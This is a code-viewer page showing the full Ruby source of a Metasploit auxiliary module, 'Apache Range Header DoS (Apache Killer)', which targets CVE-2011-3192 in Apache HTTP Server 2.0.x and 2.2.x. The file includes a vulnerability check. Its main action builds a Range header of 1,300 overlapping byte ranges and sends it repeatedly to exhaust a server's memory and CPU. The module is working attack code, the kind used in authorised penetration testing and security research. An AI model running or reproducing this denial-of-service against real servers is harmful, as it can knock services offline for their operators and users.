Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/apache_range_dos.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report9include Msf::Auxiliary::Dos1011def initialize(info = {})12super(update_info(info,13'Name' => 'Apache Range Header DoS (Apache Killer)',14'Description' => %q{15The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x16through 2.2.19 allows remote attackers to cause a denial of service (memory and17CPU consumption) via a Range header that expresses multiple overlapping ranges,18exploit called "Apache Killer"19},20'Author' =>21[22'Kingcope', #original discoverer23'Masashi Fujiwara', #metasploit module24'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability25],26'License' => MSF_LICENSE,27'Actions' =>28[29['DOS', 'Description' => 'Trigger Denial of Service against target'],30['CHECK', 'Description' => 'Check if target is vulnerable']31],32'DefaultAction' => 'DOS',33'References' =>34[35[ 'BID', '49303'],36[ 'CVE', '2011-3192'],37[ 'EDB', '17696'],38[ 'OSVDB', '74721' ],39],40'DisclosureDate' => '2011-08-19'41))4243register_options(44[45Opt::RPORT(80),46OptString.new('URI', [ true, "The request URI", '/']),47OptInt.new('RLIMIT', [ true, "Number of requests to send",50])48])49end5051def run_host(ip)5253case action.name54when 'DOS'55conduct_dos()5657when 'CHECK'58check_for_dos()59end6061end6263def check_for_dos()64uri = datastore['URI']65rhost = datastore['RHOST']66begin67res = send_request_cgi({68'uri' => uri,69'method' => 'HEAD',70'headers' => {71"HOST" => rhost,72"Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10",73"Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"74}75})7677if (res and res.code == 206)78print_status("Response was #{res.code}")79print_status("Found Byte-Range Header DOS at #{uri}")8081report_note(82:host => rhost,83:port => rport,84:type => 'apache.killer',85:data => "Apache Byte-Range DOS at #{uri}"86)8788else89print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")90end9192rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout93rescue ::Timeout::Error, ::Errno::EPIPE94end95end969798def conduct_dos()99uri = datastore['URI']100rhost = datastore['RHOST']101ranges = ''102for i in (0..1299) do103ranges += ",5-" + i.to_s104end105for x in 1..datastore['RLIMIT']106begin107print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")108res = send_request_cgi({109'uri' => uri,110'method' => 'HEAD',111'headers' => {112"HOST" => rhost,113"Range" => "bytes=0-#{ranges}",114"Request-Range" => "bytes=0-#{ranges}"}},1)115116rescue ::Rex::ConnectionRefused117print_error("Unable to connect to #{rhost}:#{rport}")118rescue ::Errno::ECONNRESET119print_good("DoS packet successful. #{rhost} not responding.")120rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout121print_error("Couldn't connect to #{rhost}:#{rport}")122rescue ::Timeout::Error, ::Errno::EPIPE123end124end125end126end127128129